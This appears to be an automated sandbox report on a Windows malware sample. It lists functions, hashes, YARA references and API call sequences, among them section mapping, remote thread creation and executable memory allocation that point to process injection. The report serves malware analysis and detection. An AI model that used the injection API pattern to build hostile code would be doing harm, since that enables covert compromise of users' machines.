Opcode ID: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
Instruction ID: c749d285b2de24fc316c817c7ae4fe8e6badb8f794917fcf5296f62f9050bee9
Opcode Fuzzy Hash: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
Instruction Fuzzy Hash: BA117C72A0C208EBE600BA949C42E7A3259AB41755F348037BA07790F0D67D9B13B72B

Function 00401874 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
Instruction ID: b17aa293f10861f930621d71b3cc53cbab5e3b4d2edd5f2ed28ca100fb2eaa3d
Opcode Fuzzy Hash: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
Instruction Fuzzy Hash: 2C010472A0C245EBEB00ABA09C4297933659F00305F248477B606790F1D57D8712F71B

Function 00401894 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
Instruction ID: b8c0f1a70be89906461d65cd061911ad83e0312d7227b68f91b7eb194a97aeae
Opcode Fuzzy Hash: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
Instruction Fuzzy Hash: CA015A7260C205EBEB01AA909C42A7A3215AB45355F248437BA17790F1C67D8A53F71B

Function 00401898 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
Instruction ID: be550ea8b7a21d6326383ffce51d2b737e5c9e0a4d996b68b29bd2ffee87f150
Opcode Fuzzy Hash: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
Instruction Fuzzy Hash: 32014F7260C205EBEB01AA909D41A7E3255AF45315F248437BA17790F1C67D8653F71B

Function 0053706D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005370BE

Memory Dump Source

Source File: 00000000.00000002.1778980791.0000000000534000.00000040.00000020.00020000.00000000.sdmp, Offset: 00534000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_534000_e0OOofAl0S.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 1d8c73d436b330b56d1dd86a12c404ad10e58c9285af47845f6568aa4169d216
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: CE113C79A00208EFDB01DF98C989E98BFF5AF08750F058094F9489B362D771EA50DF90

Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
Instruction ID: 2ebc05d28c21af2a54c4caf66b99915bed587d393384b69dc5fa06e125dea622
Opcode Fuzzy Hash: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
Instruction Fuzzy Hash: 50018F7260C205EBEB01AA909C41A7E3315AB45311F208437BA06790F1C67D8712F71B

Function 0040189C Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
Instruction ID: 055aca88afb56c34d21ecc05ae408393a65145e0cd4b89ba36dd333808a7ed44
Opcode Fuzzy Hash: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
Instruction Fuzzy Hash: C401627260C205EBEB01AA909D51A6E3355AF45351F208437BA16790F1C67D8652F71B

Non-executed Functions

Function 004A092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 004A09DC, 004A09DF, 004A09E4
l, xrefs: 004A0966
., xrefs: 004A095F

Memory Dump Source

Source File: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_e0OOofAl0S.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 032ae2445adcf9355ce1446b617a316a088ca6d6551e263125d157b1bbfe86d2
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: C1315AB6900609DFEB10CF99C880AAEBBF9FF59324F24404AD441A7311D775EA45CBA8

Function 004A154D Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_e0OOofAl0S.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3ef201b7eb768e6bc6555ba41f306de6eccaabbf2ee15fcfb797bfe8dfe952b
Instruction ID: a09514af2055564550f595cc5d6a75831b1b25344ca6e403bf9184f71b25bcd9
Opcode Fuzzy Hash: f3ef201b7eb768e6bc6555ba41f306de6eccaabbf2ee15fcfb797bfe8dfe952b
Instruction Fuzzy Hash: 972106729982409EDF559FB4C9870C27F71BE137387B41BACC4518B273CAA69113CB22

Function 00536C8B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1778980791.0000000000534000.00000040.00000020.00020000.00000000.sdmp, Offset: 00534000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_534000_e0OOofAl0S.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 17d7edd17fc8a37dc12fb4c334e1316e6f8f39dc235f1c8892ab4e9a6e1dc802
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: A3118B72340105AFDB44DF55DC81FA677EAFB89360B298069ED08CB316E676EC02C760

Function 00401C0A Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
Instruction ID: ac47c9089ab74bbd4744f5430c59f4e61b9adfdf7c8bba648fb7bf2dae8000a3
Opcode Fuzzy Hash: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
Instruction Fuzzy Hash: 10115A2049D3C05BC3878B7CD595483BFA47D1B230B5A55EED8C24F963C394A925D3A3

Function 004A1C71 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_e0OOofAl0S.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
Instruction ID: beffa67a2295d3531f69e7eb1ca379527f1e68ad246f0e50b83cf55ac921e291
Opcode Fuzzy Hash: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
Instruction Fuzzy Hash: 3411222049D3C05AC3838B7CD295483BF647E1B230B9A95EED8C24F923C345A926D3A3

Function 00401C5E Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1778723687.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e0OOofAl0S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
Instruction ID: c6b7842e347cac63059ed32f1a386f80ec7c31cd39de27a6132647ed699d03ea
Opcode Fuzzy Hash: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
Instruction Fuzzy Hash: BE019D0526E3D81AC3878B7DC1895877F017D5B13079BA2EEECC18E823C380884AC763

Function 004A1CC5 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_e0OOofAl0S.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
Instruction ID: c6b7842e347cac63059ed32f1a386f80ec7c31cd39de27a6132647ed699d03ea
Opcode Fuzzy Hash: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
Instruction Fuzzy Hash: BE019D0526E3D81AC3878B7DC1895877F017D5B13079BA2EEECC18E823C380884AC763

Function 004A0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_e0OOofAl0S.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: f80c6bb9db8b12a177546f1768fbe65e944308d77046e0a70fcc83ad7ea6cac1
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: B101F273A006008FDF21CF60C904BAB33E5EBA7306F0544AAD90A97381E378AD418B84

Function 0041A670 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041A69C
UnhandledExceptionFilter.KERNEL32(00000000), ref: 0041A6A4
GetComputerNameW.KERNEL32(?,?), ref: 0041A6F7

Strings

-, xrefs: 0041A704

Memory Dump Source

Source File: 00000000.00000002.1778740954.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_e0OOofAl0S.jbxd

Similarity

API ID: ComputerExceptionFilterNamePrivateProfileStringUnhandledWrite
String ID: -
API String ID: 1470029763-2547889144
Opcode ID: be8e2e4c92d4aa084a27bf65dbcb5d7ecd1ee3e5d5be1be516bfa36a37aadb6c
Instruction ID: 4b5e4e4b6f83c94ba78a0dd8dd4ce6fb1df44620f0ca627238bf55da635243b7
Opcode Fuzzy Hash: be8e2e4c92d4aa084a27bf65dbcb5d7ecd1ee3e5d5be1be516bfa36a37aadb6c
Instruction Fuzzy Hash: 7711E9319012189BD760DF64DC85BDE77F4FB08310F15C1B9E5D59B180CA745AC58F8A

Function 0041A730 Relevance: 6.0, APIs: 4, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,00000000,00000000,00000000,0041B044,0041AAA1), ref: 0041A74C
FreeEnvironmentStringsW.KERNEL32(00000000,00000000,0041B044,0041AAA1), ref: 0041A767
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0041A78A
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0041A792

Memory Dump Source

Source File: 00000000.00000002.1778740954.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_e0OOofAl0S.jbxd

Similarity

API ID: AllocateDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 975556166-0
Opcode ID: fcdbff5d07d9ac415359981b28a3bf4e46d87dbfd96b2b6133518f9cab96085a
Instruction ID: d58ed8a6e156ce39838269d538da37acbc757045de5b3d1f898b295708f67049
Opcode Fuzzy Hash: fcdbff5d07d9ac415359981b28a3bf4e46d87dbfd96b2b6133518f9cab96085a
Instruction Fuzzy Hash: 78F08935781200E7E6306B64EC49B863774EB18713F514032F719961F0C7A459818F5E

Analysis Process: busaafdPID: 7708, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	22.6%
Signature Coverage:	0%
Total number of Nodes:	212
Total number of Limit Nodes:	5

Executed Functions

Function 0041A7A0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 268
librarymemorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 0041A84B
SetConsoleTitleA.KERNEL32(00000000), ref: 0041A853
GlobalSize.KERNEL32(00000000), ref: 0041A85B
FindAtomW.KERNEL32(00000000), ref: 0041A863
SearchPathW.KERNEL32(0041C9D0,0041C9A0,0041C960,00000000,?,?), ref: 0041A887
SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041A891
GetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 0041A8B9
CopyFileExA.KERNEL32(0041CA1C,0041CA0C,00000000,00000000,00000000,00000000), ref: 0041A8D1
GetEnvironmentStringsW.KERNEL32 ref: 0041A8D7
WriteConsoleOutputW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0041A8F6
GetNumaNodeProcessorMask.KERNEL32(00000000,00000000), ref: 0041A900
DebugActiveProcessStop.KERNEL32(00000000), ref: 0041A908
GetUserDefaultLangID.KERNEL32 ref: 0041A922
RtlLeaveCriticalSection.NTDLL(?), ref: 0041A936
LoadLibraryA.KERNEL32(00000000), ref: 0041A94F
GetSystemTimes.KERNELBASE(?,?,?), ref: 0041A996
FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041A9BE
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041A9DD
CallNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041A9EA
GetComputerNameA.KERNEL32(00000000,00000000), ref: 0041A9F2
GetConsoleAliasExesLengthW.KERNEL32 ref: 0041A9F8
GlobalAlloc.KERNELBASE(00000000,00421ECC), ref: 0041AA3D
LoadLibraryW.KERNELBASE(0041CA54), ref: 0041AA91
GlobalSize.KERNEL32(00000000), ref: 0041AABB
InterlockedDecrement.KERNEL32(?), ref: 0041AAE8

Strings

k`, xrefs: 0041AACD
}$, xrefs: 0041AAEF
G9@, xrefs: 0041A818

Memory Dump Source

Source File: 00000005.00000002.2068532173.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_busaafd.jbxd

Similarity

API ID: Console$Global$DefaultInterlockedLengthLibraryLoadSize$ActiveAliasAliasesAllocAtomCallCommComputerConfigCopyCriticalDebugDecrementEnvironmentExchangeExesFileFindFoldLangLeaveMaskModeNameNamedNodeNumaOutputPathPipeProcessProcessorSearchSectionStopStringStringsSystemTimesTitleUserWrite
String ID: G9@$k`$}$
API String ID: 1617017930-167184026
Opcode ID: 5c7a4b6f7cbe8a4fd6a37d62c592fd6ae5ac874b6fbd6add716ca7c961466e8b
Instruction ID: 9d0e60e093157893049f9d09ff6ea3b3fc32bdf03ae3aab365a71fc4c352c97f
Opcode Fuzzy Hash: 5c7a4b6f7cbe8a4fd6a37d62c592fd6ae5ac874b6fbd6add716ca7c961466e8b
Instruction Fuzzy Hash: 8D913471645210ABD320AB60DC49BDB7BA4EF4C715F01803AF619A61F0DB785581CBEF

Function 00401476 Relevance: 10.7, APIs: 7, Instructions: 228
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2

Memory Dump Source

Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_busaafd.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
Instruction ID: 2930413ebcf3c91ef78c7b899968c143e4494e66a1317453e42a44ae66849b54
Opcode Fuzzy Hash: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
Instruction Fuzzy Hash: AB7190B1900245AFEB209F51CC49F9FBBB8FF82710F10416AF951AB2E1E7719941CB64

Function 00401493 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_busaafd.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
Instruction ID: d7c6057c418d322157b37bade1bff21ef7bff7238e112bc1c960839226febb51
Opcode Fuzzy Hash: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
Instruction Fuzzy Hash: 41616571900205FBEB209F91CC49FAF7BB8FF85710F10812AF952BA1E5D6B49901DB65

Function 004014AA Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_busaafd.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
Instruction ID: 384a0da1d92476b1279baf81ca3941c4d16b4b8eb8340d8fd65a4e2b9f3dfa72
Opcode Fuzzy Hash: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
Instruction Fuzzy Hash: B6513D71A00205BFEF209F91CC49FAF7BB8EF85B00F104129F951BA2E5D6B49905CB64

Function 004014B1 Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_busaafd.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
Instruction ID: 77e294e5c29794052b934d18963121443c47762038f294bdc3221756e3d7f28a
Opcode Fuzzy Hash: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
Instruction Fuzzy Hash: 74512C71900209BFEF209F91CC49FEFBBB8EF85B00F104159F951AA2A5E7B09941CB24

Function 004014AD Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_busaafd.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
Instruction ID: d83691bfaa908ebf768f39752e331a6567bad0fa9e9ed4c6933609491a97c617
Opcode Fuzzy Hash: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
Instruction Fuzzy Hash: 0B512B71900245BBEB209F91CC49FAF7BB8EF85B00F104129FA51BA2E5E6B49941CB64

Function 004014D5 Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_busaafd.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
Instruction ID: fd495a3767c54d0d9857a4c92bec852555a579275bcd6122a58bb2fbabb6e282
Opcode Fuzzy Hash: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
Instruction Fuzzy Hash: EF510A71900209BFEF209F91CC49FEFBBB8EF85B10F104159F911AA2A5E7B09941CB24

Function 00402F55 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403089
NtTerminateProcess.NTDLL ref: 004030A2

Memory Dump Source

Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

